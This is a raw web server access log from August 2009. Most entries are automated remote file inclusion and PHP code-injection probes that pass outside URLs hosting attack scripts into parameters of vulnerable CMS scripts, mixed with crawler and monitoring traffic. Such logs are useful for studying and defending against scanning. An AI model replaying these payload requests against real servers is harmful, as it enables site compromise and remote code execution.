70.87.217.26 - - [02/Aug/2009:01:00:41 -0400] "GET //vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
70.87.217.26 - - [02/Aug/2009:01:00:41 -0400] "GET /logs/access_log.Q109061000//vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
131.203.76.246 - - [02/Aug/2009:01:01:18 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??%20? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
131.203.76.246 - - [02/Aug/2009:01:01:18 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??%20? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
131.203.76.246 - - [02/Aug/2009:01:01:18 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:01:18 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:01:18 -0400] "GET /logs//viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:01:18 -0400] "GET //viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:01:18 -0400] "GET /logs/access_log.Q109052100//viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.30.81.182 - - [02/Aug/2009:01:01:24 -0400] "GET /logs/access_log.Q109071500 HTTP/1.0" 200 4717248 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.237.66.229 - - [02/Aug/2009:01:01:50 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:01:50 -0400] "GET /logs/access_log.Q109052100//viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:01:50 -0400] "GET //viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:01:50 -0400] "GET /logs//viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:01:50 -0400] "GET /logs/access_log.Q109070400//viewbody.html?code=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.87.217.26 - - [02/Aug/2009:01:02:19 -0400] "GET //vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
70.87.217.26 - - [02/Aug/2009:01:02:19 -0400] "GET /logs//vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.87.217.26 - - [02/Aug/2009:01:02:19 -0400] "GET /logs/access_log.Q109061000//vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
131.203.76.246 - - [02/Aug/2009:01:03:44 -0400] "GET /logs/access_log.Q109070400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??%20? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:01:04:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.201 - - [02/Aug/2009:01:05:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1171B5482BE58500B1D304W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.16 - - [02/Aug/2009:01:05:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1171B5482BB55500B1D304W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.16 - - [02/Aug/2009:01:05:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1171B5482C550500B6D304W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [02/Aug/2009:01:05:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1171B5482B95D500B0D304W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.121.14.50 - - [02/Aug/2009:01:08:24 -0400] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:01:08:24 -0400] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:01:08:32 -0400] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:01:08:32 -0400] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:01:08:34 -0400] "GET /logs/access_log.Q109061000/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:01:08:41 -0400] "GET /logs/access_log.Q109061000%20%20/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
131.203.76.246 - - [02/Aug/2009:01:09:47 -0400] "GET /logs/access_log.Q109070400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??%20? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:01:09:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.85.114.102 - - [02/Aug/2009:01:11:44 -0400] "GET HTTP/1.1 HTTP/1.1" 400 189 "-" "Toata dragostea mea pentru diavola"
203.85.114.102 - - [02/Aug/2009:01:11:44 -0400] "GET /install.txt HTTP/1.1" 404 209 "-" "Toata dragostea mea pentru diavola"
203.85.114.102 - - [02/Aug/2009:01:11:45 -0400] "GET / HTTP/1.1" 200 409 "-" "Toata dragostea mea pentru diavola"
203.85.114.102 - - [02/Aug/2009:01:11:45 -0400] "GET /cart/ HTTP/1.1" 404 203 "-" "Toata dragostea mea pentru diavola"
203.85.114.102 - - [02/Aug/2009:01:11:46 -0400] "GET /zencart/ HTTP/1.1" 404 206 "-" "Toata dragostea mea pentru diavola"
203.85.114.102 - - [02/Aug/2009:01:11:46 -0400] "GET /zen-cart/ HTTP/1.1" 404 207 "-" "Toata dragostea mea pentru diavola"
203.85.114.102 - - [02/Aug/2009:01:11:47 -0400] "GET /zen/ HTTP/1.1" 404 202 "-" "Toata dragostea mea pentru diavola"
203.85.114.102 - - [02/Aug/2009:01:11:47 -0400] "GET /shop/ HTTP/1.1" 404 203 "-" "Toata dragostea mea pentru diavola"
216.14.113.10 - - [02/Aug/2009:01:13:06 -0400] "GET /logs///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:01:13:06 -0400] "GET ///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:01:13:06 -0400] "GET /logs/access_log.Q109061000%20%20///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:01:13:16 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [02/Aug/2009:01:13:40 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://hongfuqitian.com/m1.gif??%20? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
201.232.54.48 - - [02/Aug/2009:01:13:40 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://hongfuqitian.com/m1.gif??%20? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:01:14:28 -0400] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:01:14:32 -0400] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:01:14:42 -0400] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:01:14:47 -0400] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:01:14:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.201 - - [02/Aug/2009:01:15:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1171B5482C058500B7D304W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.44.187.42 - - [02/Aug/2009:01:15:24 -0400] "GET /logs/access_log.Q109061000/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:01:15:34 -0400] "GET /logs/access_log.Q109061000%20%20/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:01:16:16 -0400] "GET /logs/?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 200 12004 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:01:16:16 -0400] "GET /?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:01:16:16 -0400] "GET /logs/access_log.Q109063000/?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:01:16:36 -0400] "GET /logs/access_log.Q109063000/?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:01:16:35 -0400] "GET /logs/?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 200 12004 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:01:16:36 -0400] "GET /?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:16:51 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:16:51 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:16:51 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:16:51 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:16:51 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:16:51 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:01:17:34 -0400] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:01:17:34 -0400] "GET /logs/error_log.Q109061000/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:01:17:35 -0400] "GET /logs/access_log.Q109061000/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:01:17:40 -0400] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
117.110.74.195 - - [02/Aug/2009:01:18:22 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:18:22 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:18:22 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:18:29 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:01:18:34 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:01:19:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.110.74.195 - - [02/Aug/2009:01:20:18 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
123.125.66.134 - - [02/Aug/2009:01:20:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.14.113.10 - - [02/Aug/2009:01:22:54 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.181.7.127 - - [02/Aug/2009:01:23:00 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.14.113.10 - - [02/Aug/2009:01:23:01 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
24.63.24.34 - - [02/Aug/2009:01:23:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
24.63.24.34 - - [02/Aug/2009:01:23:15 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
24.63.24.34 - - [02/Aug/2009:01:23:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
24.63.24.34 - - [02/Aug/2009:01:23:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
201.232.54.48 - - [02/Aug/2009:01:23:31 -0400] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://hongfuqitian.com/m1.gif??%20? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.15.48.60 - - [02/Aug/2009:01:24:18 -0400] "GET /logs//config.php?inc_dir=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
67.15.48.60 - - [02/Aug/2009:01:24:18 -0400] "GET //config.php?inc_dir=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
81.169.138.128 - - [02/Aug/2009:01:24:19 -0400] "GET /logs/access_log.Q109063000%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
81.169.138.128 - - [02/Aug/2009:01:24:19 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.803"
81.169.138.128 - - [02/Aug/2009:01:24:19 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
213.251.189.204 - - [02/Aug/2009:01:24:25 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:24:25 -0400] "GET //include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:24:25 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:01:24:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.32.69.162 - - [02/Aug/2009:01:24:56 -0400] "GET /logs/access_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:01:24:56 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:01:24:56 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
66.249.71.201 - - [02/Aug/2009:01:25:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1171B5482C350500B2D304W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.32.69.162 - - [02/Aug/2009:01:25:36 -0400] "GET /logs/error_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
213.251.189.204 - - [02/Aug/2009:01:25:43 -0400] "GET //include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:25:43 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:25:56 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:26:34 -0400] "GET //include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:26:34 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:27:01 -0400] "GET //include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:27:01 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.251.189.204 - - [02/Aug/2009:01:27:01 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://ardamyo.trakya.edu.tr/components/com_sh404sef/cache/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.67.26.187 - - [02/Aug/2009:01:27:48 -0400] "GET /logs/access_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
80.67.26.187 - - [02/Aug/2009:01:27:48 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.808"
80.67.26.187 - - [02/Aug/2009:01:27:48 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.808"
72.32.69.162 - - [02/Aug/2009:01:27:50 -0400] "GET /logs/access_log.Q109063000%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
80.67.26.187 - - [02/Aug/2009:01:28:24 -0400] "GET /logs/error_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
86.58.155.104 - - [02/Aug/2009:01:29:46 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
86.58.155.104 - - [02/Aug/2009:01:29:46 -0400] "GET /logs/access_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
86.58.155.104 - - [02/Aug/2009:01:29:46 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
209.59.12.99 - - [02/Aug/2009:01:29:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.58.155.104 - - [02/Aug/2009:01:30:39 -0400] "GET /logs/error_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
72.32.69.162 - - [02/Aug/2009:01:32:02 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:01:32:02 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:01:32:02 -0400] "GET /logs/access_log.Q109063000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:01:32:04 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.activity.org.ua/main//inc/cmss/yes.txt??%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:01:32:04 -0400] "GET /logs/access_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.activity.org.ua/main//inc/cmss/yes.txt??%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
